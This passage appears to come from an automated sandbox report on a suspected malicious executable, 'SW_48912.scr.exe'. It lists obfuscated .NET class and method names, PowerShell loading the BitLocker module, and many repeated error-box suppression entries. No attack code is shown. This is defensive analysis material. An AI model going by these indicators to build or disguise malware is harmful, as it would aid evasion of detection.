                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, QM3KVliEY4gN7aP3Ii.csHigh entropy of concatenated method names: 'ihu4X94X3h', 'jj54ALqJ81', 'dlO4ueAfgd', 'mYJ4jicbcL', 'jat41RWyQD', 'H6u4rx5uHW', 'KlX8AGJKrAEwqZiWo0', 'wBKGpA5PDVfgvvHrXs', 'WvC44T25yK', 'YTb4UMFIrv'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, mXhVcrzAahkX4e1o6e.csHigh entropy of concatenated method names: 'qG8TYCIkAI', 'd3lT6AvriN', 'aivTCMTRf2', 'uhWTxyUEUS', 'UaITp6GSqc', 'LPiTFHostR', 'p7vTvpWPbZ', 'q9ZTG2xQ6T', 'lwfTgmyAuW', 'LwnTKVQvgh'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, JZQbrfRNmtXNOmHYD5.csHigh entropy of concatenated method names: 'X5dXLZYoUV', 'FQyX8uSrXx', 'KgvXHlCVFN', 'tpSHwukD6c', 'R1MHzqb62C', 'iHyXbGYcuq', 'kLSX4aVJ9V', 'T8rXoxMe9l', 'sBnXUbNCQT', 'CX3Xi9POLB'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, qWFQwglLpPhAuvpMU4.csHigh entropy of concatenated method names: 'FUa1clNQil', 'JJe13xdVf7', 'kjw1latO5I', 'vVj1q3dKho', 'bWK1pXrDSD', 'ktY1Je3AA9', 'HFl1F44U4h', 'rjw1vv2SmQ', 'YkC1EHYchI', 'l3r1RT7ad0'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, iVXIBw4inrWlaNUiWD5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BduIZkdjZC', 'ET7ITDr0SZ', 'zfLIhUvSP8', 'hWnII2H9QY', 'rBuI0yPRub', 'vO6I2LfShs', 'Mj0IGE0Dow'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, aKG09444XxmTvLhxHg5.csHigh entropy of concatenated method names: 'zrxTwD7vIy', 'cWcTzGnGrk', 'WtThbnO3KC', 'WXAh4ZxELB', 'ePlhoG5FlB', 'cwRhUTmoQV', 'He0hixWZlx', 'KD6hMWVp3n', 'gIchLkv2h8', 'hashaBvp48'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, m94X3h6Xj5LqJ81Tpq.csHigh entropy of concatenated method names: 'ceealjTRiD', 'A5paqKvBYV', 'kXDaVXi7O3', 'gj5aDS8rjJ', 'PEeanF7tHo', 'WKHasFTcrY', 'dfwatQiqsw', 'oN3a9ADFPR', 'd8maSlBayR', 'RYYawtRVDd'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, qOTDadsiHR5BK2xURX.csHigh entropy of concatenated method names: 'mOQf9FV25G', 'oMgfwWDhcj', 'lITQbWX0mO', 'wEpQ4tPiXw', 'CUDfNI1PgK', 'jFHf3s4wx6', 'RvxfevrucW', 'BdhflXLvPr', 'ew5fqsVySH', 'uAifVeFlOA'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, CiOdRiClOeAfgdjYJi.csHigh entropy of concatenated method names: 'uMm8m1v0CK', 'dY58YBSHaK', 'I2f86Xq9lL', 'CfR8C5UCtK', 'PIe81SLWjc', 'goA8rL2ZJV', 'd8v8fbxe9Q', 'WOW8QdODdy', 'YEv8ZbbbyF', 'aZS8T5ZO0L'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, NbcLSmPLGpctpXatRW.csHigh entropy of concatenated method names: 'qo5ykguZKh', 'k77ydb9AXV', 'HZh8J1qgFv', 'Ld28FPS5vs', 'v1S8vQKTZL', 'lJs8EPhJNY', 'wcB8RjNeC4', 'Wia87hxVsZ', 'zmq8BrISx9', 'SV78cNCMqv'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, AUVf05wvGYk17tuTaf.csHigh entropy of concatenated method names: 'u75T8Bdi6C', 'RakTy7QuMg', 'v0uTHO9odD', 'LJ7TXxdKmu', 'FBoTZkXEcY', 'WudTAlkWSQ', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, kETZ0xat9xhtwhakBX.csHigh entropy of concatenated method names: 'Dispose', 'eTu4SSLhyM', 'WHvopvwUbM', 'sZpqvPRssW', 'F8T4wBsTQZ', 'rGm4zJT4sH', 'ProcessDialogKey', 'O3nobiyJH6', 'JVYo4bQ0dG', 'ab2ookUVf0'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, brOdrNtVbMTuSLhyMP.csHigh entropy of concatenated method names: 'BFkZ12vnM4', 'HfhZfVMQgM', 'dAfZZFPIFW', 'wKaZhmEYaq', 'MIKZ0MQLPb', 'OJ3ZG7ctoj', 'Dispose', 'OxoQLa7oFm', 'lu1Qa41iqK', 'kO1Q8Ftmml'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, hQDJ6uxx5uHWEQO5CH.csHigh entropy of concatenated method names: 'KQqHMsb1c5', 'J42HanoYZ7', 'AxxHyOynSc', 'sMiHXD2wFh', 'hwaHACyGAe', 'zDHynO9ghA', 'DxFyskndjF', 'YsWyt7SGfv', 'TcNy9A2crO', 'fWJySQ7rGp'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, Poh9fae0KkTkb0mvJP.csHigh entropy of concatenated method names: 'u5MO6fHBEu', 'gIwOCuBs85', 'D7OOxgsfia', 'BJqOp5xZui', 'i6UOF5nDe2', 'db1OvYsUGO', 'zPNORM0bqU', 'Q2UO7EPCd6', 'hlNOcjb72C', 'IxBON8FHIs'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, r9j0NhBG7VqKxGXCdS.csHigh entropy of concatenated method names: 'ILJXgCYsC3', 'KeAXKiaWRD', 'aJFXWu6lmb', 'fCDXmCOvHA', 'WygXkeEYpp', 'lR6XYJsGBd', 'WL4Xdfmt08', 'mrcX62oId2', 'mREXCkpQyV', 'wHAXPYY6yB'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, UiyJH6SvVYbQ0dGbb2.csHigh entropy of concatenated method names: 'T2dZxhOnAm', 'cZZZpTUN0D', 'fnOZJ7ZP0F', 'C8oZFbIKSG', 'pbyZvLoBk4', 'lwkZE6fKAj', 'dEyZR7wFv5', 'Qj0Z7xeBUw', 'MXmZBdj4j2', 'JkPZc149E1'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, n9y3C8oW1f1VmVSpTJ.csHigh entropy of concatenated method names: 'vJ8W8w5rc', 'yDYmR1Kqr', 'LBtYoXVZO', 'dLxdyD89n', 'OIBCHmwcC', 'hD7PiMJ39', 'MS9PyyK1y2pRMI8A5y', 'OhC2cekGu0WEfAKk31', 'LIcQmyfIB', 'poGTkBkmw'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, ix1KuNDjeYkrDHmaNB.csHigh entropy of concatenated method names: 'AqufuYgQHa', 'TR7fjh1KCf', 'ToString', 'zSsfL0Pahw', 'qNFfaijCjF', 'E6Af8ldcZm', 'vwlfyOsNKN', 'qumfHcYbsa', 'KlvfXneQUw', 'Oy8fA47mbA'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, oiTVwJAvTb3AhAW3OM.csHigh entropy of concatenated method names: 'RbAUMBsbHh', 'jKRULYHmHB', 'J3GUaxp0l1', 'K0SU87s07C', 'vZTUygYq4g', 'iK5UHIAnNS', 'f0hUXNkrrN', 'yJZUAifWVH', 'MQ5U5JVvbW', 'xg0UurKomU'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, QM3KVliEY4gN7aP3Ii.csHigh entropy of concatenated method names: 'ihu4X94X3h', 'jj54ALqJ81', 'dlO4ueAfgd', 'mYJ4jicbcL', 'jat41RWyQD', 'H6u4rx5uHW', 'KlX8AGJKrAEwqZiWo0', 'wBKGpA5PDVfgvvHrXs', 'WvC44T25yK', 'YTb4UMFIrv'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, mXhVcrzAahkX4e1o6e.csHigh entropy of concatenated method names: 'qG8TYCIkAI', 'd3lT6AvriN', 'aivTCMTRf2', 'uhWTxyUEUS', 'UaITp6GSqc', 'LPiTFHostR', 'p7vTvpWPbZ', 'q9ZTG2xQ6T', 'lwfTgmyAuW', 'LwnTKVQvgh'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, JZQbrfRNmtXNOmHYD5.csHigh entropy of concatenated method names: 'X5dXLZYoUV', 'FQyX8uSrXx', 'KgvXHlCVFN', 'tpSHwukD6c', 'R1MHzqb62C', 'iHyXbGYcuq', 'kLSX4aVJ9V', 'T8rXoxMe9l', 'sBnXUbNCQT', 'CX3Xi9POLB'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, qWFQwglLpPhAuvpMU4.csHigh entropy of concatenated method names: 'FUa1clNQil', 'JJe13xdVf7', 'kjw1latO5I', 'vVj1q3dKho', 'bWK1pXrDSD', 'ktY1Je3AA9', 'HFl1F44U4h', 'rjw1vv2SmQ', 'YkC1EHYchI', 'l3r1RT7ad0'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, iVXIBw4inrWlaNUiWD5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BduIZkdjZC', 'ET7ITDr0SZ', 'zfLIhUvSP8', 'hWnII2H9QY', 'rBuI0yPRub', 'vO6I2LfShs', 'Mj0IGE0Dow'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, aKG09444XxmTvLhxHg5.csHigh entropy of concatenated method names: 'zrxTwD7vIy', 'cWcTzGnGrk', 'WtThbnO3KC', 'WXAh4ZxELB', 'ePlhoG5FlB', 'cwRhUTmoQV', 'He0hixWZlx', 'KD6hMWVp3n', 'gIchLkv2h8', 'hashaBvp48'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, m94X3h6Xj5LqJ81Tpq.csHigh entropy of concatenated method names: 'ceealjTRiD', 'A5paqKvBYV', 'kXDaVXi7O3', 'gj5aDS8rjJ', 'PEeanF7tHo', 'WKHasFTcrY', 'dfwatQiqsw', 'oN3a9ADFPR', 'd8maSlBayR', 'RYYawtRVDd'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, qOTDadsiHR5BK2xURX.csHigh entropy of concatenated method names: 'mOQf9FV25G', 'oMgfwWDhcj', 'lITQbWX0mO', 'wEpQ4tPiXw', 'CUDfNI1PgK', 'jFHf3s4wx6', 'RvxfevrucW', 'BdhflXLvPr', 'ew5fqsVySH', 'uAifVeFlOA'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, CiOdRiClOeAfgdjYJi.csHigh entropy of concatenated method names: 'uMm8m1v0CK', 'dY58YBSHaK', 'I2f86Xq9lL', 'CfR8C5UCtK', 'PIe81SLWjc', 'goA8rL2ZJV', 'd8v8fbxe9Q', 'WOW8QdODdy', 'YEv8ZbbbyF', 'aZS8T5ZO0L'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, NbcLSmPLGpctpXatRW.csHigh entropy of concatenated method names: 'qo5ykguZKh', 'k77ydb9AXV', 'HZh8J1qgFv', 'Ld28FPS5vs', 'v1S8vQKTZL', 'lJs8EPhJNY', 'wcB8RjNeC4', 'Wia87hxVsZ', 'zmq8BrISx9', 'SV78cNCMqv'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, AUVf05wvGYk17tuTaf.csHigh entropy of concatenated method names: 'u75T8Bdi6C', 'RakTy7QuMg', 'v0uTHO9odD', 'LJ7TXxdKmu', 'FBoTZkXEcY', 'WudTAlkWSQ', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, kETZ0xat9xhtwhakBX.csHigh entropy of concatenated method names: 'Dispose', 'eTu4SSLhyM', 'WHvopvwUbM', 'sZpqvPRssW', 'F8T4wBsTQZ', 'rGm4zJT4sH', 'ProcessDialogKey', 'O3nobiyJH6', 'JVYo4bQ0dG', 'ab2ookUVf0'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, brOdrNtVbMTuSLhyMP.csHigh entropy of concatenated method names: 'BFkZ12vnM4', 'HfhZfVMQgM', 'dAfZZFPIFW', 'wKaZhmEYaq', 'MIKZ0MQLPb', 'OJ3ZG7ctoj', 'Dispose', 'OxoQLa7oFm', 'lu1Qa41iqK', 'kO1Q8Ftmml'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, hQDJ6uxx5uHWEQO5CH.csHigh entropy of concatenated method names: 'KQqHMsb1c5', 'J42HanoYZ7', 'AxxHyOynSc', 'sMiHXD2wFh', 'hwaHACyGAe', 'zDHynO9ghA', 'DxFyskndjF', 'YsWyt7SGfv', 'TcNy9A2crO', 'fWJySQ7rGp'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, Poh9fae0KkTkb0mvJP.csHigh entropy of concatenated method names: 'u5MO6fHBEu', 'gIwOCuBs85', 'D7OOxgsfia', 'BJqOp5xZui', 'i6UOF5nDe2', 'db1OvYsUGO', 'zPNORM0bqU', 'Q2UO7EPCd6', 'hlNOcjb72C', 'IxBON8FHIs'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
